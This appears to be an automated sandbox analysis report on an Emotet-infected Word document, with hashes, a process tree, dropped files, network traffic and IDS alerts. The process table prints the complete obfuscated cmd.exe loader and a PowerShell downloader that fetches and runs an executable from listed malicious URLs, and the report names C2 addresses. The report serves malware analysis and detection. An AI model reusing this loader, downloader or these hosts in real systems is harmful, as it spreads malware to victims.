File name: | 121820189B2T19072.doc |
Full analysis: | https://app.any.run/tasks/35410362-584e-447b-bf3a-a42e8890e146 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 14:04:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 21:25:00 2018, Last Saved Time/Date: Mon Dec 17 21:25:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 34, Security: 0 |
MD5: | C251A828D61AC7FC1E8D9A697081A6BA |
SHA1: | 177438D9B4AA8BA8854285ED11E6B336B55282F1 |
SHA256: | 30C56DE0EF715B1CC99C56D1FE5C5E91162B6C2757CEDAC47118063C762A112E |
SSDEEP: | 1536:lI681ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvad2lYPkkVpwRJr0XbF3+Dh8b8:lI68GhDS0o9zTGOZD6EbzCdMiwT1h8b |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:17 21:25:00 |
ModifyDate: | 2018:12:17 21:25:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 34 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 38 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2920 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\121820189B2T19072.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4008 | c:\HDjzASw\dXUoDSp\rQWBhXVQZ\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set 5k0=DjEYwUizYplXvvcpzfiFOfohJ\:e'ASG,K{1L}TQnm8tykgx/WNB+ ZaI6P2@5;M$d.C4()0s9r=7b-u&&for %f in (64;30;1;31;75;28;50;55;10;28;62;64;20;45;21;75;40;27;4;78;22;77;1;27;14;43;53;50;27;43;66;49;27;77;67;10;18;27;40;43;62;64;1;31;15;75;28;23;43;43;15;26;48;48;4;4;4;66;21;79;40;43;27;10;22;66;14;22;41;48;61;42;30;35;47;24;71;73;60;23;43;43;15;26;48;48;4;4;4;66;72;23;22;79;43;68;41;79;72;18;14;66;14;22;41;48;33;45;43;68;67;5;58;13;11;59;60;23;43;43;15;26;48;48;55;65;13;79;72;43;27;14;23;66;14;22;41;48;10;61;2;14;55;41;38;0;44;60;23;43;43;15;26;48;48;4;4;4;66;14;27;27;27;43;4;23;66;22;74;46;48;5;54;4;23;76;2;56;49;0;57;60;23;43;43;15;26;48;48;4;4;4;66;46;41;10;72;22;21;43;4;55;74;27;66;14;22;41;48;18;43;38;54;56;40;27;61;63;28;66;30;15;10;18;43;69;28;60;28;70;62;64;19;4;79;75;28;8;8;18;28;62;64;58;72;36;53;75;53;28;73;76;61;28;62;64;38;39;72;75;28;51;18;30;28;62;64;29;38;19;75;64;27;40;13;26;43;27;41;15;52;28;25;28;52;64;58;72;36;52;28;66;27;47;27;28;62;21;22;74;27;55;14;23;69;64;13;56;14;53;18;40;53;64;1;31;15;70;34;43;74;44;34;64;20;45;21;66;0;22;4;40;10;22;55;65;19;18;10;27;69;64;13;56;14;32;53;64;29;38;19;70;62;64;11;4;11;75;28;41;41;20;28;62;56;21;53;69;69;31;27;43;78;56;43;27;41;53;64;29;38;19;70;66;10;27;40;46;43;23;53;78;46;27;53;42;71;71;71;71;70;53;34;56;40;13;22;45;27;78;56;43;27;41;53;64;29;38;19;62;64;1;36;18;75;28;29;49;56;28;62;77;74;27;55;45;62;37;37;14;55;43;14;23;34;37;37;64;16;4;16;75;28;19;55;14;28;62;86)do set ZH=!ZH!!5k0:~%f,1!&&if %f==86 powershell "!ZH:~-458!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2536 | CmD /V/C"set 5k0=DjEYwUizYplXvvcpzfiFOfohJ\:e'ASG,K{1L}TQnm8tykgx/WNB+ ZaI6P2@5;M$d.C4()0s9r=7b-u&&for %f in (64;30;1;31;75;28;50;55;10;28;62;64;20;45;21;75;40;27;4;78;22;77;1;27;14;43;53;50;27;43;66;49;27;77;67;10;18;27;40;43;62;64;1;31;15;75;28;23;43;43;15;26;48;48;4;4;4;66;21;79;40;43;27;10;22;66;14;22;41;48;61;42;30;35;47;24;71;73;60;23;43;43;15;26;48;48;4;4;4;66;72;23;22;79;43;68;41;79;72;18;14;66;14;22;41;48;33;45;43;68;67;5;58;13;11;59;60;23;43;43;15;26;48;48;55;65;13;79;72;43;27;14;23;66;14;22;41;48;10;61;2;14;55;41;38;0;44;60;23;43;43;15;26;48;48;4;4;4;66;14;27;27;27;43;4;23;66;22;74;46;48;5;54;4;23;76;2;56;49;0;57;60;23;43;43;15;26;48;48;4;4;4;66;46;41;10;72;22;21;43;4;55;74;27;66;14;22;41;48;18;43;38;54;56;40;27;61;63;28;66;30;15;10;18;43;69;28;60;28;70;62;64;19;4;79;75;28;8;8;18;28;62;64;58;72;36;53;75;53;28;73;76;61;28;62;64;38;39;72;75;28;51;18;30;28;62;64;29;38;19;75;64;27;40;13;26;43;27;41;15;52;28;25;28;52;64;58;72;36;52;28;66;27;47;27;28;62;21;22;74;27;55;14;23;69;64;13;56;14;53;18;40;53;64;1;31;15;70;34;43;74;44;34;64;20;45;21;66;0;22;4;40;10;22;55;65;19;18;10;27;69;64;13;56;14;32;53;64;29;38;19;70;62;64;11;4;11;75;28;41;41;20;28;62;56;21;53;69;69;31;27;43;78;56;43;27;41;53;64;29;38;19;70;66;10;27;40;46;43;23;53;78;46;27;53;42;71;71;71;71;70;53;34;56;40;13;22;45;27;78;56;43;27;41;53;64;29;38;19;62;64;1;36;18;75;28;29;49;56;28;62;77;74;27;55;45;62;37;37;14;55;43;14;23;34;37;37;64;16;4;16;75;28;19;55;14;28;62;86)do set ZH=!ZH!!5k0:~%f,1!&&if %f==86 powershell "!ZH:~-458!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2440 | powershell "$SjG='Nal';$Okf=new-object Net.WebClient;$jGp='http://www.funtelo.com/58S1xJ09@http://www.shout4music.com/Kkt4CUPvX2@http://advustech.com/l5EcamTDy@http://www.ceeetwh.org/UZwh7EIWD6@http://www.gmlsoftware.com/itTZIne5M'.Split('@');$Fwu='YYi';$PsL = '975';$TQs='BiS';$ATF=$env:temp+'\'+$PsL+'.exe';foreach($vIc in $jGp){try{$Okf.DownloadFile($vIc, $ATF);$XwX='mmO';If ((Get-Item $ATF).length -ge 80000) {Invoke-Item $ATF;$jLi='AWI';break;}}catch{}}$zwz='Fac';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3732 | "C:\Users\admin\AppData\Local\Temp\975.exe" | C:\Users\admin\AppData\Local\Temp\975.exe | — | powershell.exe |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Exit code: 0 Version: 8.00.0.010 | ||||
2916 | "C:\Users\admin\AppData\Local\Temp\975.exe" | C:\Users\admin\AppData\Local\Temp\975.exe | 975.exe | |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Exit code: 0 Version: 8.00.0.010 | ||||
2448 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 975.exe |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Exit code: 0 Version: 8.00.0.010 | ||||
3196 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Version: 8.00.0.010 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR691B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EA9E5DA.wmf | — | |
MD5:— | SHA256:— | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A8C7AF8.wmf | — | |
MD5:— | SHA256:— | |||
2440 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6A4DPG3S457SRO8PRK0I.temp | — | |
MD5:— | SHA256:— | |||
2440 | powershell.exe | C:\Users\admin\AppData\Local\Temp\975.exe | — | |
MD5:— | SHA256:— | |||
2916 | 975.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:BFF499B19048AEB6308763BC8705B772 | SHA256:186C64C5118DE2EB3F81846E356BB12EAA91D6D86FDABB9F9D261F7CC0B6B5A6 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6474936BCF9E0E40D986D76CB8B97569 | SHA256:A429E08BF13A763B1E1B56C70E9C488FD3A3D63556417F9C15A5F53B8F3D1253 | |||
2440 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BA077FD.wmf | wmf | |
MD5:6552FAFA5881CDBEBC9A955FAEA4C595 | SHA256:4B37A50873D200021E60C452DCDB40EF374DA8AAA4DCF81FF8AEC8CAB710814F | |||
2440 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF24760b.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3196 | archivesymbol.exe | GET | — | 78.189.21.131:80 | http://78.189.21.131/ | TR | — | — | malicious |
3196 | archivesymbol.exe | GET | — | 187.140.90.91:8080 | http://187.140.90.91:8080/ | MX | — | — | malicious |
2440 | powershell.exe | GET | 200 | 74.208.53.56:80 | http://advustech.com/l5EcamTDy/ | US | executable | 124 Kb | malicious |
2440 | powershell.exe | GET | 403 | 109.203.99.114:80 | http://www.shout4music.com/Kkt4CUPvX2 | GB | html | 400 b | malicious |
2440 | powershell.exe | GET | 301 | 74.208.53.56:80 | http://advustech.com/l5EcamTDy | US | html | 239 b | malicious |
2440 | powershell.exe | GET | 302 | 192.185.2.61:80 | http://www.funtelo.com/58S1xJ09 | US | html | 297 b | malicious |
3196 | archivesymbol.exe | GET | 200 | 201.190.150.60:443 | http://201.190.150.60:443/ | AR | binary | 132 b | malicious |
2440 | powershell.exe | GET | 200 | 192.185.2.61:80 | http://www.funtelo.com/cgi-sys/suspendedpage.cgi | US | html | 7.12 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2440 | powershell.exe | 109.203.99.114:80 | www.shout4music.com | Simply Transit Ltd | GB | malicious |
3196 | archivesymbol.exe | 81.150.17.158:50000 | — | British Telecommunications PLC | GB | malicious |
3196 | archivesymbol.exe | 78.189.21.131:80 | — | Turk Telekom | TR | malicious |
3196 | archivesymbol.exe | 187.140.90.91:8080 | — | Uninet S.A. de C.V. | MX | malicious |
2440 | powershell.exe | 74.208.53.56:80 | advustech.com | 1&1 Internet SE | US | malicious |
2440 | powershell.exe | 192.185.2.61:80 | www.funtelo.com | CyrusOne LLC | US | malicious |
3196 | archivesymbol.exe | 213.120.119.231:8443 | — | British Telecommunications PLC | GB | malicious |
3196 | archivesymbol.exe | 201.190.150.60:443 | — | ARLINK S.A. | AR | malicious |
3196 | archivesymbol.exe | 81.150.17.158:8443 | — | British Telecommunications PLC | GB | malicious |
Domain | IP | Reputation |
---|---|---|
www.funtelo.com |
| malicious |
www.shout4music.com |
| malicious |
advustech.com |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2440 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2440 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2440 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious redirect to 'suspendedpage.cgi' |
2440 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2440 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2440 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2440 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2440 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2440 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2440 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |